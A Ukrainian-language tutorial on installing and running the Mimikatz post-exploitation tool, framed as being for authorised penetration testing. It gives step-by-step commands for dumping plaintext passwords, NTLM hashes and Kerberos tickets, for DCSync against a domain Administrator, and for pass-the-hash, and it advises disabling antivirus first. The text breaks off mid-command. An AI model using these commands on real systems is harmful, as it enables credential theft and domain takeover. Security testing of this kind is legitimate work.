Вступ
Mimikatz – це потужний інструмент пост-експлуатації, призначений для вилучення з пам’яті відкритих паролів, хешів, PIN-кодів і квитків Kerberos. Він широко використовується тестувальниками проникнення і фахівцями з безпеки для оцінки вразливостей систем. Цей посібник надає покроковий підхід до встановлення та використання Mimikatz для етичного тестування безпеки.
Попередження: Несанкціоноване використання Mimikatz є незаконним. Переконайтеся, що у вас є дозвіл, перш ніж використовувати його в будь-якому середовищі.
Необхідні умови
Перед встановленням Mimikatz переконайтеся, що у вас є наступне:
- Комп’ютер з Windows(Windows 7 , 10, 11 або Server версії)
- Привілеї адміністратора
- Захисник Windows та будь-яке антивірусне програмне забезпечення вимкнено (Mimikatz часто позначається як шкідливе програмне забезпечення)
Завантаження Mimikatz
Mimikatz – це інструмент з відкритим вихідним кодом, доступний на GitHub. Щоб завантажити його:
- Відкрийте веб-браузер і перейдіть на https://github.com/gentilkiwi/mimikatz.
- Натисніть ” Код ” > ” Завантажити ZIP“.
- Розпакуйте ZIP-архів до обраної вами папки.
Крім того, ви можете клонувати сховище за допомогою Git’а:
git clone https://github.com/gentilkiwi/mimikatz.gitЗапуск Mimikatz
Оскільки Mimikatz вимагає адміністративних привілеїв, виконайте ці кроки, щоб запустити його:
- Відкрийте командний рядок або PowerShell від імені адміністратора.
- Перейдіть до папки, з якої ви розпакували Mimikatz:
cd шлях\до\mimikatz\x64 - Запустіть Mimikatz:
mimikatz.exe - Ви повинні побачити інтерфейс командного рядка з запрошенням
mimikatz #.
Основні команди Mimikatz
1. Перевірка системних привілеїв
Перш ніж витягувати облікові дані, перевірте, чи маєте ви достатні привілеї:
privilege::debugЯкщо все пройшло успішно, ви повинні побачити Привілей '20' OK
2. Вилучення паролів з пам’яті
Щоб витягти паролі з пам’яті у вигляді відкритого тексту, скористайтеся:
sekurlsa::logonpasswordsНа екран буде виведено ім’я користувача, домен і паролі у відкритому вигляді, якщо вони доступні.
3. Дамп хешів NTLM
Хеші NTLM можуть бути використані для атак типу “перехоплення хешу”. Щоб витягти їх, виконайте:
lsadump::samАбо, для віддалених систем:
lsadump::dcsync /domain:targetdomain.com /user:Administrator4. Витяг квитків Kerberos
Для отримання квитків Kerberos з системи:
sekurlsa::tickets /exportЕкспортує файли .kirbi, які можуть бути використані в атаках типу pass-the-ticket.
5. Pass-the-Hash атака
Для автентифікації за допомогою NTLM хешу замість пароля:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:

